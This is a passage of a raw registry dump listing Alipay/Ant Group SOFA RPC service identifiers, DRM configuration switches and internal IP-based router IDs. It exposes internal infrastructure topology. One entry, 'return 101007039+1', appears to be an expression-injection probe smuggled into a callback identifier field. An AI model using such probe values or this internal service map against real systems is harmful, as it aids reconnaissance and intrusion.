loanstatement.api.P2pLoanStatementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cnamlmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcloanprod.common.service.facade.service.product.LoanProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.32.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.core.service.process.ProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zskynet.facade.spi.BizSolutionQueryFacade:1.0:fincoretechdss@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amct.facade.DictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.settingendowment.query.SettingEndowmentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zdatafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualOrderNotify,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.open.api.group.EntityGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodswitch.common.service.facade.ProductSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledataprod.service.facade.MobileContactRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenSecuUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenewfin.common.service.facade.api.recommend.CapitalPlanTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.rzone.InfluxRecoverRService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.ActionConditionManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antcloud.yunyou.facade.ReleaseWindowFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.facade.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.enterprise.PcreditEnterpriseReimburseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEOPS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:default-egg-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.goods.ShopGoodsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.speedup.SpeedupDatasourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.comparacenter.common.service.facade.load.api.ComParaClientRegistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecodec.service.facade.ShareCodeTextConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetDrmConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finscenepage@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.agreement.service.QueryUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.exchange.ExchangeMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.vatrans.api.VirtualtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiantrans.common.service.InsInvoiceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcapplycore.common.service.facade.contract.ContractSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:distinguishprod_antprocess_verify_finish_callback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.alipayOfficialVisitMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.common.service.facade.api.orgconfig.PcinstOrgInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.CloudboxCheckRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:zmbuservice-operatorfacade-querybyid@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.core.config.api.LocalCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.biz.group.rpc.MerchantGroupRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.ps.user.UserWorkTimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.common.service.facade.module.YellowAlertMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.mergeQuotaRecoveryFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almanalysis.common.service.facade.api.FundPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.213.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelspop.service.decision.channel.ChannelRuleOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.checkGeoCountryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_1301#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.task.rpc.facade.activity.ChannelPromoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.crmtask.facade.CsplatformCrmTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.scibase.facade.project.ProjectRestFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.tradeRefundRuleRetrieveSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExClientRateMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.cs.ivr.common.service.facade.api.IvrCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.SidecarOdpLimitRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.productThresholdFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeOldPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:appxprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.PlatformManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.StandardCatalogQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:mif-cache-remove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_agreementunfreezeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.204.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autodqc.GnMbtCaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.NewRiskAdvicePolicyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:batch_related_checker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-budgetcore-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbtraffic.common.service.facade.api.schedule.bigbuy.BigBuyItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PricemngUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.clause.ConversionShareClauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit2.InvitationPlanManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.NodeService:1.0:nodeService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AccountListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.component.service.CrowdLotteryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.reloadHAErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwalm.facade.api.FmInstManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.facade.relationship.MrchGroupWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.alarm.AlarmEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.orderlink.OrderLinkBatchOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.partner.PartnerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.label.api.AILabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ontology.RelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ChangeOrderMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.bxh.InsFollowServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.UserQuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.RiskEventResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.reservation.ReservationUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.GotoneConfigDrmResource.repayNotesOfRepayDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.180.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insunderwritingcore.common.service.RenewalUnderwritingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.255.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:tmnotify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.StsServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paygrowth.biz.service.rpc.PayAbilityEvaluateRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicDistributionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bktranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.policybench.common.service.facade.api.PolicyDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.SwitchCoreQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.StationFacade:1.0:kStationFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.ExecutionRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.29.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmcRiskEventQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.AppointmentWalletRedDotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkopsmng_callcallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityControlRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.manage.facade.api.ItemPurchaseTypeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:tbasemanager-change-plan-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.dataasking.DataAskingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductIntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcApplicationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillLendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.ApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.eventconfig.api.EventConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ImplementationPlanFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:scard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.serivce.query.MerchantAgreementQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.prize.PcreditActivityCoreContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.248.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.aliyun.apsarabase.euler.resource.service.facade.api.ContainerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_bkBenefitTemplateSuccessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.productOrderDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundguardian.common.facade.service.Yeb04AVerifyReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autodrive.DefaultTransAccountInfoConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.leads.facade.LeadsOfflineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.config.drm.DrmLogElasticSwtichConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfe.crowd.CrowdMetaFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArGlobalLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.data.DataSecondaryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.lendpofprod.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promohelix.common.service.facade.api.sci.TaskActionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.CsccActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.coveragecenter.common.service.gray.api.GrayCoverageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ServerLabelUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.monitor.MonitorEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.role.RoleService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mbillexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-bigfishoffical@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.servicelibrary.ServiceLibraryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.enterTairExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.64.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.97.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kmi.common.service.client.api.KmiCertClientApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.common.EbppCopyConfMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.LimitCumAmountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.LiveServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.cashier.common.service.facade.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditStarSalary,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.biz.asset.service.PeriodAssetTransTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.dataSyncLoadTableNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.zproxy.VerifyZpFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PLEDGECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.push.PushManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.point.facade.PointMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchProductPositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.dataschema.DataSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chair.NoMosn.EchoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.LeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.product.service.ProductQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcenter.service.facade.limitcheck.api.LimitCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxDataManageService:1.0:none@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelVerityProblemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.membertask.MemberTaskListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:return 101007039+1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.processmng.common.service.facade.TaskCleanService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.core.bizcheckengine.KmiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.user.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gloancore_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.100.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_APPSTORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_workOrderApproveSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.service.facade.LogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgmng.common.service.facade.subgraph.SubgraphService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.core.repository.GroovyBeanRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mymdp.model.bypass.drm.DrmSwitchProxyResource.globalFlowSwitch4Mps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.caseAmountLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.biz.promo.assist.rpc.PromotionInfoManagerRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.60.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.v2.tagrelation.facade.TagRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.58#@#DEFAULT_INST